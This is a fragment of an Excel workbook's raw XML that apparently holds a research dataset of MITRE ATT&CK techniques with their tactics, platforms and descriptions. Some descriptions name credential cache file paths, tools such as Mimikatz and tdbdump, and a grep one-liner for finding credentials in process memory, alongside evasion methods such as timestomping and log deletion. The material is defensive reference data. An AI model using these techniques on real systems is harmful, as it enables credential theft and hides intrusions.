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jcadmin\Documents\EMU\COT898-Dissertation\Articles and Datasets\Selected\cti_data\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="8_{1D57AD51-7587-475B-89DD-1B6F860114D3}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="-11025" yWindow="-12435" windowWidth="21390" windowHeight="11385" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
  </bookViews>
  <sheets>
    <sheet name="pivot" sheetId="26" r:id="rId1"/>
    <sheet name="Mitre Techniques" sheetId="19" r:id="rId2"/>
    <sheet name="Data Sources" sheetId="9" r:id="rId3"/>
    <sheet name="legends" sheetId="21" r:id="rId4"/>
    <sheet name="Basic Progress" sheetId="23" r:id="rId5"/>
    <sheet name="Advanced Progress" sheetId="25" r:id="rId6"/>
  </sheets>
  <definedNames>
    <definedName name="_xlnm._FilterDatabase" localSheetId="1" hidden="1">'Mitre Techniques'!$A$1:$C$657</definedName>
  </definedNames>
  <calcPr calcId="191028"/>
  <pivotCaches>
    <pivotCache cacheId="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 i="23" l="1"/>
  <c r="P3" i="23"/>
  <c r="P2" i="23"/>
  <c r="C11" i="23" l="1"/>
  <c r="N11" i="23"/>
  <c r="O11" i="23"/>
  <c r="B11" i="23"/>
  <c r="E11" i="23"/>
  <c r="M11" i="23"/>
  <c r="K11" i="23"/>
  <c r="L11" i="23"/>
  <c r="J11" i="23"/>
  <c r="I11" i="23"/>
  <c r="F11" i="23"/>
  <c r="H11" i="23"/>
  <c r="G11" i="23"/>
  <c r="D11" i="23"/>
  <c r="C4" i="25" l="1"/>
  <c r="N4" i="25"/>
  <c r="O4" i="25"/>
  <c r="B4" i="25"/>
  <c r="P11" i="23"/>
  <c r="D4" i="25"/>
  <c r="G4" i="25"/>
  <c r="H4" i="25"/>
  <c r="F4" i="25"/>
  <c r="I4" i="25"/>
  <c r="J4" i="25"/>
  <c r="L4" i="25"/>
  <c r="K4" i="25"/>
  <c r="M4" i="25"/>
  <c r="E4" i="25"/>
</calcChain>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="2925" uniqueCount="1371">
  <si>
    <t>Reconnaissance</t>
  </si>
  <si>
    <t>Resource Development</t>
  </si>
  <si>
    <t>Initial Access</t>
  </si>
  <si>
    <t>Execution</t>
  </si>
  <si>
    <t>Persistence</t>
  </si>
  <si>
    <t>Privilege Escalation</t>
  </si>
  <si>
    <t>Defense Evasion</t>
  </si>
  <si>
    <t>Credential Access</t>
  </si>
  <si>
    <t>Discovery</t>
  </si>
  <si>
    <t>Lateral Movement</t>
  </si>
  <si>
    <t>Collection</t>
  </si>
  <si>
    <t>Command and Control</t>
  </si>
  <si>
    <t>Exfiltration</t>
  </si>
  <si>
    <t>Impact</t>
  </si>
  <si>
    <t>yes</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</si>
  <si>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t>
  </si>
  <si>
    <t>Yes</t>
  </si>
  <si>
    <t>ID</t>
  </si>
  <si>
    <t>Tactics</t>
  </si>
  <si>
    <t>Coverage</t>
  </si>
  <si>
    <t>platforms</t>
  </si>
  <si>
    <t>description</t>
  </si>
  <si>
    <t>T1001</t>
  </si>
  <si>
    <t>Network Traffic: Network Traffic Content</t>
  </si>
  <si>
    <t>Linux, Windows, macOS</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may obfuscate command and control traffic to make it more difficult to detect.(Citation: Bitdefender FunnyDream Campaign November 2020)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</si>
  <si>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 xml:space="preserve">Adversaries may add junk data to protocols used for command and control to make detection more difficult.(Citation: FireEye SUNBURST Backdoor December 2020)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</si>
  <si>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</si>
  <si>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Adversaries may also leverage legitimate protocols to impersonate expected web traffic or trusted services. For example, adversaries may manipulate HTTP headers, URI endpoints, SSL certificates, and transmitted data to disguise C2 communications or mimic legitimate services such as Gmail, Google Drive, and Yahoo Messenger.(Citation: ESET Okrum July 2019)(Citation: Malleable-C2-U42)</t>
  </si>
  <si>
    <t>T1003</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password. Credentials can be obtained from OS caches, memory, or structures.(Citation: Brining MimiKatz to Unix)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</si>
  <si>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Windows</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Command: Command Execution</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</si>
  <si>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On Linux systems, Active Directory credentials can be accessed through caches maintained by software like System Security Services Daemon (SSSD) or Quest Authentication Services (formerly VAS). Cached credential hashes are typically located at `/var/lib/sss/db/cache.[domain].ldb` for SSSD or `/var/opt/quest/vas/authcache/vas_auth.vdb` for Quest. Adversaries can use utilities, such as `tdbdump`, on these database files to dump the cached hashes and use [Password Cracking](https://attack.mitre.org/techniques/T1110/002) to obtain the plaintext password.(Citation: Brining MimiKatz to Unix) 
With SYSTEM or sudo access, the tools/utilities such as [Mimikatz](https://attack.mitre.org/software/S0002), [Reg](https://attack.mitre.org/software/S0075), and secretsdump.py for Windows or Linikatz for Linux can be used to extract the cached credentials.(Citation: Brining MimiKatz to Unix)
Note: Cached credentials for Windows Vista are derived using PBKDF2.(Citation: PassLib mscache)</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</si>
  <si>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</si>
  <si>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indicative of credentials. Adversaries may use regex patterns, such as &lt;code&gt;grep -E "^[0-9a-f-]* r" /proc/"$pid"/maps | cut -d' ' -f 1&lt;/code&gt;, to look for fixed strings in memory structures or cached hashes.(Citation: atomic-red proc file system)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</si>
  <si>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</si>
  <si>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T1005</t>
  </si>
  <si>
    <t>Linux, Network, Windows, macOS</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</si>
  <si>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</si>
  <si>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T1006</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</si>
  <si>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t>
  </si>
  <si>
    <t>T1007</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</si>
  <si>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</si>
  <si>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T1008</t>
  </si>
  <si>
    <t>Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds.</t>
  </si>
  <si>
    <t>T1010</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</si>
  <si>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t>
  </si>
  <si>
    <t>T1011</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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1012</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</si>
  <si>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</si>
  <si>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T1014</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</si>
  <si>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</si>
  <si>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T1016</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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t xml:space="preserve">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t>
  </si>
  <si>
    <t>T1018</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</si>
  <si>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</si>
  <si>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T1020</t>
  </si>
  <si>
    <t>Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection.(Citation: ESET Gamaredon June 2020)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</si>
  <si>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t>
  </si>
  <si>
    <t>T1021</t>
  </si>
  <si>
    <t>IaaS, Linux, Windows, macOS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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>Linux, macOS</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</si>
  <si>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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>Logon Session: Logon Session Creation</t>
  </si>
  <si>
    <t>IaaS, Identity Provider, Office Suite, SaaS</t>
  </si>
  <si>
    <t xml:space="preserve">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t>
  </si>
  <si>
    <t>IaaS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</si>
  <si>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t>
  </si>
  <si>
    <t>T1025</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</si>
  <si>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</si>
  <si>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T1027</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</si>
  <si>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</si>
  <si>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File: File Metadata</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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ilasm.exe(Citation: ATTACK IQ),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</si>
  <si>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Application Log: Application Log Content</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</si>
  <si>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</si>
  <si>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File: File Creation</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may store data in "fileless" formats to conceal malicious activity from defenses. Fileless storage can be broadly defined as any format other than a file. Common examples of non-volatile fileless storage in Windows systems include the Windows Registry, event logs, or WMI repository.(Citation: Microsoft Fileless)(Citation: SecureList Fileless) In Linux systems, shared memory directories such as `/dev/shm`, `/run/shm`, `/var/run`, and `/var/lock` may also be considered fileless storage, as files written to these directories are mapped directly to RAM and not stored on the disk.(Citation: Elastic Binary Executed from Shared Memory Directory)(Citation: Akami Frog4Shell 2024)(Citation: Aquasec Muhstik Malware 2024)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Leveraging fileless storage may also allow adversaries to bypass the protections offered by read-only file systems in Linux.(Citation: Sysdig Fileless Malware 23022)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t>
  </si>
  <si>
    <t xml:space="preserve">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t>
  </si>
  <si>
    <t>Adversaries may encrypt or encode files to obfuscate strings, bytes, and other specific patterns to impede detection. Encrypting and/or encoding file content aims to conceal malicious artifacts within a file used in an intrusion. Many other techniques, such as [Software Packing](https://attack.mitre.org/techniques/T1027/002), [Steganography](https://attack.mitre.org/techniques/T1027/003), and [Embedded Payloads](https://attack.mitre.org/techniques/T1027/009), share this same broad objective. Encrypting and/or encoding files could lead to a lapse in detection of static signatures, only for this malicious content to be revealed (i.e., [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140)) at the time of execution/use.
This type of file obfuscation can be applied to many file artifacts present on victim hosts, such as malware log/configuration and payload files.(Citation: File obfuscation) Files can be encrypted with a hardcoded or user-supplied key, as well as otherwise obfuscated using standard encoding/compression schemes such as Base64.
The entire content of a file may be obfuscated, or just specific functions or values (such as C2 addresses). Encryption and encoding may also be applied in redundant layers for additional protection.
For example, adversaries may abuse password-protected Word documents or self-extracting (SFX) archives as a method of encrypting/encoding a file such as a [Phishing](https://attack.mitre.org/techniques/T1566) payload. These files typically function by attaching the intended archived content to a decompressor stub that is executed when the file is invoked (e.g., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: SFX - Encrypted/Encoded File) 
Adversaries may also abuse file-specific as well as custom encoding schemes. For example, Byte Order Mark (BOM) headers in text files may be abused to manipulate and obfuscate file content until [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) execution.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may utilize polymorphic code (also known as metamorphic or mutating code) to evade detection. Polymorphic code is a type of software capable of changing its runtime footprint during code execution.(Citation: polymorphic-blackberry) With each execution of the software, the code is mutated into a different version of itself that achieves the same purpose or objective as the original. This functionality enables the malware to evade traditional signature-based defenses, such as antivirus and antimalware tools.(Citation: polymorphic-sentinelone) 
Other obfuscation techniques can be used in conjunction with polymorphic code to accomplish the intended effects, including using mutation engines to conduct actions such as [Software Packing](https://attack.mitre.org/techniques/T1027/002), [Command Obfuscation](https://attack.mitre.org/techniques/T1027/010), or [Encrypted/Encoded File](https://attack.mitre.org/techniques/T1027/013).(Citation: polymorphic-linkedin)(Citation: polymorphic-medium)
</t>
  </si>
  <si>
    <t>T1029</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</si>
  <si>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</si>
  <si>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T1030</t>
  </si>
  <si>
    <t>An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.</t>
  </si>
  <si>
    <t>T1033</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</si>
  <si>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</si>
  <si>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T1036</t>
  </si>
  <si>
    <t>Containers, Linux, Windows, macOS</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t xml:space="preserve">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t>
  </si>
  <si>
    <t>User Account: User Account Creation</t>
  </si>
  <si>
    <t>Containers, IaaS, Identity Provider, Linux, Office Suite, SaaS, Windows, macOS</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may match or approximate the names of legitimate accounts to make newly created ones appear benign. This will typically occur during [Create Account](https://attack.mitre.org/techniques/T1136), although accounts may also be renamed at a later date. This may also coincide with [Account Access Removal](https://attack.mitre.org/techniques/T1531) if the actor first deletes an account before re-creating one with the same name.(Citation: Huntress MOVEit 2023)
Often, adversaries will attempt to masquerade as service accounts, such as those associated with legitimate software, data backups, or container cluster management.(Citation: Elastic CUBA Ransomware 2022)(Citation: Aquasec Kubernetes Attack 2023) They may also give accounts generic, trustworthy names, such as “admin”, “help”, or “root.”(Citation: Invictus IR Cloud Ransomware 2024) Sometimes adversaries may model account names off of those already existing in the system, as a follow-on behavior to [Account Discovery](https://attack.mitre.org/techniques/T1087).  
Note that this is distinct from [Impersonation](https://attack.mitre.org/techniques/T1656), which describes impersonating specific trusted individuals or organizations, rather than user or service account names.  </t>
  </si>
  <si>
    <t>T1037</t>
  </si>
  <si>
    <t>Persistence, Privilege Escalation</t>
  </si>
  <si>
    <t>Adversaries may use scripts automatically executed at boot or logon initialization to establish persistence.(Citation: Mandiant APT29 Eye Spy Email Nov 22)(Citation: Anomali Rocke March 2019)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t>
  </si>
  <si>
    <t xml:space="preserve">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t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may use a Login Hook to establish persistence executed upon user logon. A login hook is a plist file that points to a specific script to execute with root privileges upon user logon. The plist file is located in the &lt;code&gt;/Library/Preferences/com.apple.loginwindow.plist&lt;/code&gt; file and can be modified using the &lt;code&gt;defaults&lt;/code&gt; command-line utility. This behavior is the same for logout hooks where a script can be executed upon user logout. All hooks require administrator permissions to modify or create hooks.(Citation: Login Scripts Apple Dev)(Citation: LoginWindowScripts Apple Dev) 
Adversaries can add or insert a path to a malicious script in the &lt;code&gt;com.apple.loginwindow.plist&lt;/code&gt; file, using the &lt;code&gt;LoginHook&lt;/code&gt; or &lt;code&gt;LogoutHook&lt;/code&gt; key-value pair. The malicious script is executed upon the next user login. If a login hook already exists, adversaries can add additional commands to an existing login hook. There can be only one login and logout hook on a system at a time.(Citation: S1 macOs Persistence)(Citation: Wardle Persistence Chapter)
**Note:** Login hooks were deprecated in 10.11 version of macOS in favor of [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) </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</si>
  <si>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</si>
  <si>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</si>
  <si>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mechanism.(Citation: Methods of Mac Malware Persistence) Additionally, since StartupItems run during the bootup phase of macOS, they will run as the elevated root user.</t>
  </si>
  <si>
    <t>T1039</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</si>
  <si>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</si>
  <si>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T1040</t>
  </si>
  <si>
    <t>Credential Access, Discovery</t>
  </si>
  <si>
    <t>Adversaries may passively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reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and/or [Defense Evasion](https://attack.mitre.org/tactics/TA0005) activities. Adversaries may likely also utilize network sniffing during [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) (AiTM) to passively gain additional knowledge about the environment.
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
On network devices, adversaries may perform network captures using [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `monitor capture`.(Citation: US-CERT-TA18-106A)(Citation: capture_embedded_packet_on_software)</t>
  </si>
  <si>
    <t>T1041</t>
  </si>
  <si>
    <t>Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is encoded into the normal communications channel using the same protocol as command and control communications.</t>
  </si>
  <si>
    <t>T1046</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</si>
  <si>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</si>
  <si>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T1047</t>
  </si>
  <si>
    <t>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“disabled by default”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t>
  </si>
  <si>
    <t>T1048</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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 xml:space="preserve">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</si>
  <si>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T1049</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</si>
  <si>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</si>
  <si>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T1052</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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1053</t>
  </si>
  <si>
    <t>Execution, Persistence, Privilege Escalation</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</si>
  <si>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t>
  </si>
  <si>
    <t>Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the &lt;code&gt;at.allow&lt;/code&gt; file. If the &lt;code&gt;at.allow&lt;/code&gt; file does not exist, the &lt;code&gt;at.deny&lt;/code&gt; file is checked. Every username not listed in &lt;code&gt;at.deny&lt;/code&gt; is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the &lt;code&gt;at.deny&lt;/code&gt; exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
Adversaries may use [at](https://attack.mitre.org/software/S0110) to execute programs at system startup or on a scheduled basis for [Persistence](https://attack.mitre.org/tactics/TA0003). [at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote [Execution](https://attack.mitre.org/tactics/TA0002) as part of [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and/or to run a process under the context of a specified account (such as SYSTEM).
In Linux environments, adversaries may also abuse [at](https://attack.mitre.org/software/S0110) to break out of restricted environments by using a task to spawn an interactive system shell or to run system commands. Similarly, [at](https://attack.mitre.org/software/S0110) may also be used for [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) if the binary is allowed to run as superuser via &lt;code&gt;sudo&lt;/code&gt;.(Citation: GTFObins at)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may abuse the &lt;code&gt;cron&lt;/code&gt; utility to perform task scheduling for initial or recurring execution of malicious code.(Citation: 20 macOS Common Tools and Techniques)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[Persistence](https://attack.mitre.org/tactics/TA0003). </t>
  </si>
  <si>
    <t xml:space="preserve">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Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) (WMI) to create a scheduled task. Adversaries may also utilize the Powershell Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red Team)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</si>
  <si>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Systemd timers may be activated remotely via the &lt;code&gt;systemctl&lt;/code&gt; command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)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persistence.(Citation: Falcon Sandbox smp: 28553b3a9d)</t>
  </si>
  <si>
    <t>Containers</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</si>
  <si>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various nodes within a cluster.(Citation: Threat Matrix for Kubernetes)</t>
  </si>
  <si>
    <t>T1055</t>
  </si>
  <si>
    <t>Defense Evasion, Privilege Escalation</t>
  </si>
  <si>
    <t xml:space="preserve">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</si>
  <si>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 xml:space="preserve">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Another variation of this method, often referred to as Module Stomping/Overloading or DLL Hollowing, may be leveraged to conceal injected code within a process. This method involves loading a legitimate DLL into a remote process then manually overwriting the module's &lt;code&gt;AddressOfEntryPoint&lt;/code&gt; before starting a new thread in the target process.(Citation: Module Stomping for Shellcode Injection) This variation allows attackers to hide malicious injected code by potentially backing its execution with a legitimate DLL file on disk.(Citation: Hiding Malicious Code with Module Stomping) 
Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via DLL injection may also evade detection from security products since the execution is masked under a legitimate process. </t>
  </si>
  <si>
    <t xml:space="preserve">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t>
  </si>
  <si>
    <t xml:space="preserve">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t>
  </si>
  <si>
    <t xml:space="preserve">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t>
  </si>
  <si>
    <t xml:space="preserve">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t>
  </si>
  <si>
    <t xml:space="preserve">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that are non-child processes and/or have higher-privileges.(Citation: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t>
  </si>
  <si>
    <t>File: File Modification</t>
  </si>
  <si>
    <t xml:space="preserve">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t>
  </si>
  <si>
    <t>Process: OS API Execution</t>
  </si>
  <si>
    <t xml:space="preserve">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t>
  </si>
  <si>
    <t xml:space="preserve">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t>
  </si>
  <si>
    <t xml:space="preserve">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t>
  </si>
  <si>
    <t xml:space="preserve">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2009)(Citation: Backtrace VDSO)(Citation: VDSO Aug 2005)(Citation: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t>
  </si>
  <si>
    <t>Adversaries may abuse list-view controls to inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. ListPlanting is a method of executing arbitrary code in the address space of a separate live process.(Citation: Hexacorn Listplanting) Code executed via ListPlanting may also evade detection from security products since the execution is masked under a legitimate process.
List-view controls are user interface windows used to display collections of items.(Citation: Microsoft List View Controls) Information about an application's list-view settings are stored within the process' memory in a &lt;code&gt;SysListView32&lt;/code&gt; control.
ListPlanting (a form of message-passing "shatter attack") may be performed by copying code into the virtual address space of a process that uses a list-view control then using that code as a custom callback for sorting the listed items.(Citation: Modexp Windows Process Injection) Adversaries must first copy code into the target process’ memory space, which can be performed various ways including by directly obtaining a handle to the &lt;code&gt;SysListView32&lt;/code&gt; child of the victim process window (via Windows API calls such as &lt;code&gt;FindWindow&lt;/code&gt; and/or &lt;code&gt;EnumWindows&lt;/code&gt;) or other [Process Injection](https://attack.mitre.org/techniques/T1055) methods.
Some variations of ListPlanting may allocate memory in the target process but then use window messages to copy the payload, to avoid the use of the highly monitored &lt;code&gt;WriteProcessMemory&lt;/code&gt; function. For example, an adversary can use the &lt;code&gt;PostMessage&lt;/code&gt; and/or &lt;code&gt;SendMessage&lt;/code&gt; API functions to send &lt;code&gt;LVM_SETITEMPOSITION&lt;/code&gt; and &lt;code&gt;LVM_GETITEMPOSITION&lt;/code&gt; messages, effectively copying a payload 2 bytes at a time to the allocated memory.(Citation: ESET InvisiMole June 2020) 
Finally, the payload is triggered by sending the &lt;code&gt;LVM_SORTITEMS&lt;/code&gt; message to the &lt;code&gt;SysListView32&lt;/code&gt; child of the process window, with the payload within the newly allocated buffer passed and executed as the &lt;code&gt;ListView_SortItems&lt;/code&gt; callback.</t>
  </si>
  <si>
    <t>T1056</t>
  </si>
  <si>
    <t>Collection, Credential Access</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</si>
  <si>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t>
  </si>
  <si>
    <t xml:space="preserve">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</si>
  <si>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[AppleScript](https://attack.mitre.org/techniques/T1059/002)(Citation: LogRhythm Do You Trust Oct 2014)(Citation: OSX Keydnap malware)(Citation: Spoofing credential dialogs) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).(Citation: LogRhythm Do You Trust Oct 2014)(Citation: Enigma Phishing for Credentials Jan 2015)(Citation: Spoofing credential dialogs) On Linux systems adversaries may launch dialog boxes prompting users for credentials from malicious shell scripts or the command line (i.e. [Unix Shell](https://attack.mitre.org/techniques/T1059/004)).(Citation: Spoofing credential dialogs)
Adversaries may also mimic common software authentication requests, such as those from browsers or email clients. This may also be paired with user activity monitoring (i.e., [Browser Information Discovery](https://attack.mitre.org/techniques/T1217) and/or [Application Window Discovery](https://attack.mitre.org/techniques/T1010)) to spoof prompts when users are naturally accessing sensitive sites/data.</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</si>
  <si>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t>
  </si>
  <si>
    <t xml:space="preserve">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t>
  </si>
  <si>
    <t>T1057</t>
  </si>
  <si>
    <t>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</si>
  <si>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T1059</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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executables.(Citation: Zscaler APT31 Covid-19 October 2020)
Python comes with many built-in packages to interact with the underlying system, such as file operations and device I/O. Adversaries can use these libraries to download and execute commands or other scripts as well as perform various malicious behaviors.</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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t xml:space="preserve">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t>
  </si>
  <si>
    <t>Adversaries may execute commands and perform malicious tasks using AutoIT and AutoHotKey automation scripts. AutoIT and AutoHotkey (AHK) are scripting languages that enable users to automate Windows tasks. These automation scripts can be used to perform a wide variety of actions, such as clicking on buttons, entering text, and opening and closing programs.(Citation: AutoIT)(Citation: AutoHotKey)
Adversaries may use AHK (`.ahk`) and AutoIT (`.au3`) scripts to execute malicious code on a victim's system. For example, adversaries have used for AHK to execute payloads and other modular malware such as keyloggers. Adversaries have also used custom AHK files containing embedded malware as [Phishing](https://attack.mitre.org/techniques/T1566) payloads.(Citation: Splunk DarkGate)
These scripts may also be compiled into self-contained executable payloads (`.exe`).(Citation: AutoIT)(Citation: AutoHotKey)</t>
  </si>
  <si>
    <t>Adversaries may abuse Lua commands and scripts for execution. Lua is a cross-platform scripting and programming language primarily designed for embedded use in applications. Lua can be executed on the command-line (through the stand-alone lua interpreter), via scripts (&lt;code&gt;.lua&lt;/code&gt;), or from Lua-embedded programs (through the &lt;code&gt;struct lua_State&lt;/code&gt;).(Citation: Lua main page)(Citation: Lua state)
Lua scripts may be executed by adversaries for malicious purposes. Adversaries may incorporate, abuse, or replace existing Lua interpreters to allow for malicious Lua command execution at runtime.(Citation: PoetRat Lua)(Citation: Lua Proofpoint Sunseed)(Citation: Cyphort EvilBunny)(Citation: Kaspersky Lua)</t>
  </si>
  <si>
    <t>T1068</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</si>
  <si>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</si>
  <si>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T1069</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>T1070</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</si>
  <si>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</si>
  <si>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With administrator privileges,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
Adversaries may also attempt to clear logs by directly deleting the stored log files within `C:\Windows\System32\winevt\logs\`.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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>Adversaries may modify file time attributes to hide new files or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder and blend malicious files with legitimate files.
Both the `$STANDARD_INFORMATION` (`$SI`) and `$FILE_NAME` (`$FN`) attributes record times in a Master File Table (MFT) file.(Citation: Inversecos Timestomping 2022) `$SI` (dates/time stamps) is displayed to the end user, including in the File System view, while `$FN` is dealt with by the kernel.(Citation: Magnet Forensics)
Modifying the `$SI` attribute is the most common method of timestomping because it can be modified at the user level using API calls. `$FN` timestomping, however, typically requires interacting with the system kernel or moving or renaming a file.(Citation: Inversecos Timestomping 2022)
Adversaries modify timestamps on files so that they do not appear conspicuous to forensic investigators or file analysis tools. In order to evade detections that rely on identifying discrepancies between the `$SI` and `$FN` attributes, adversaries may also engage in “double timestomping” by modifying times on both attributes simultaneously.(Citation: Double Timestomping)
Timestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools.(Citation: WindowsIR Anti-Forensic Techniques)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</si>
  <si>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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>Once a payload is delivered, adversaries may reproduce copies of the same malware on the victim system to remove evidence of their presence and/or avoid defenses. Copying malware payloads to new locations may also be combined with [File Deletion](https://attack.mitre.org/techniques/T1070/004) to cleanup older artifacts.
Relocating malware may be a part of many actions intended to evade defenses. For example, adversaries may copy and rename payloads to better blend into the local environment (i.e., [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005)).(Citation: DFIR Report Trickbot June 2023) Payloads may also be repositioned to target [File/Path Exclusions](https://attack.mitre.org/techniques/T1564/012) as well as specific locations associated with establishing [Persistence](https://attack.mitre.org/tactics/TA0003).(Citation: Latrodectus APR 2024)
Relocating malicious payloads may also hinder defensive analysis, especially to separate these payloads from earlier events (such as [User Execution](https://attack.mitre.org/techniques/T1204) and [Phishing](https://attack.mitre.org/techniques/T1566)) that may have generated alerts or otherwise drawn attention from defenders.</t>
  </si>
  <si>
    <t>T1071</t>
  </si>
  <si>
    <t xml:space="preserve">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DNS, or publishing/subscribing. For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP.(Citation: Mandiant APT29 Eye Spy Email Nov 22) </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</si>
  <si>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</si>
  <si>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SMB(Citation: US-CERT TA18-074A), FTP(Citation: ESET Machete July 2019),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</si>
  <si>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traffic.(Citation: FireEye APT28) </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</si>
  <si>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</si>
  <si>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Adversaries may communicate using publish/subscribe (pub/sub) application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. 
Protocols such as &lt;code&gt;MQTT&lt;/code&gt;, &lt;code&gt;XMPP&lt;/code&gt;, &lt;code&gt;AMQP&lt;/code&gt;, and &lt;code&gt;STOMP&lt;/code&gt; use a publish/subscribe design, with message distribution managed by a centralized broker.(Citation: wailing crab sub/pub)(Citation: Mandiant APT1 Appendix) Publishers categorize their messages by topics, while subscribers receive messages according to their subscribed topics.(Citation: wailing crab sub/pub) An adversary may abuse publish/subscribe protocols to communicate with systems under their control from behind a message broker while also mimicking normal, expected traffic.</t>
  </si>
  <si>
    <t>T1072</t>
  </si>
  <si>
    <t>Execution, Lateral Movement</t>
  </si>
  <si>
    <t>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Entra ID.(Citation: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t>
  </si>
  <si>
    <t>T1074</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1078</t>
  </si>
  <si>
    <t>Defense Evasion, Initial Access, Persistence, Privilege Escalation</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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion.(Citation: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t>
  </si>
  <si>
    <t xml:space="preserve">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t>
  </si>
  <si>
    <t xml:space="preserve">Valid accounts in cloud environments may allow adversaries to perform actions to achieve Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. Cloud Accounts can exist solely in the cloud; alternatively, they may be hybrid-joined between on-premises systems and the cloud through syncing or federation with other identity sources such as Windows Active Directory. (Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation)
